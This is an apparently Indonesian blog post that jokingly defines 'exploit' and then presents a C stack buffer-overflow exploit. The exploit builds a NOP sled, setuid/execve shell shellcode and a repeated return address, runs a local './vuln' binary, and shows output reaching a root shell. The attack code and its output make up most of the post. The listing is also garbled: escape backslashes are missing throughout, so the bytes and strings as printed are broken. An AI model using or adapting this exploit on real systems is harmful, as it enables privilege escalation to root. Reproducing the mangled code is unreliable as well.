exploit

arti dalam bahasa indonesia mungkin, memanfaatkan atau menipu atau, pokok nya itu deh 😀 … kegiatan ini sama halnya dengan naik pangkat secara tidak benar yang di tempuh dengan membodoh-bodohi sistem kepegawaian … wekekeke kok sampai kesitu yah Bahh..

berikut contoh nya, sekali lagi ini hanya contoh yah, jangan di coba dirumah, tingkat kegagalannya 100% trus buat apa ada tulisan ini, mari nikmati saja HAHAHA …

#include <stdlib.h>

char shellcode[] =
"x31xc0xb0x46x31xdbx31xc9xcdx80xebx16x5bx31xc0"
"x88x43x07x89x5bx08x89x43x0cxb0x0bx8dx4bx08x8d"
"x53x0cxcdx80xe8xe5xffxffxffx2fx62x69x6ex2fx73"
"x68";

unsigned long sp(void)
{ __asm__("movl %esp, %eax");}

int main(int argc, char *argv[])
{
   int i, offset;
   long esp, ret, *addr_ptr;
   char *buffer, *ptr;

   offset = 0;
   esp = sp();
   ret = esp - offset;

printf("Stack pointer (ESP) : 0x%xn", esp);
printf("    Offset from ESP : 0x%xn", offset);
printf("Desired Return Addr : 0x%xn", ret);

 buffer = malloc(600);

 ptr = buffer;
 addr_ptr = (long *) ptr;
 for(i=0; i < 600; i+=4)
 { *(addr_ptr++) = ret; }

 for(i=0; i < 200; i++)
 { buffer[i] = 'x90'; }

 ptr = buffer + 200;
 for(i=0; i < strlen(shellcode); i++)
 { *(ptr++) = shellcode[i]; }

 buffer[600-1] = 0;

 execl("./vuln", "vuln", buffer, 0);

 free(buffer);

   return 0;
}

//Setelah itu compile lah listing di atas, dan abadikan perbuatan mu :P

$ gcc -o exploit exploit.c
$ ./exploit
Stack pointer (ESP) : 0xbffff978
   Offset from ESP : 0x0
Desired Return Addr : 0xbffff978
sh-2.05a# whoami
root
sh-2.05a#

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *

Situs ini menggunakan Akismet untuk mengurangi spam. Pelajari bagaimana data komentar Anda diproses.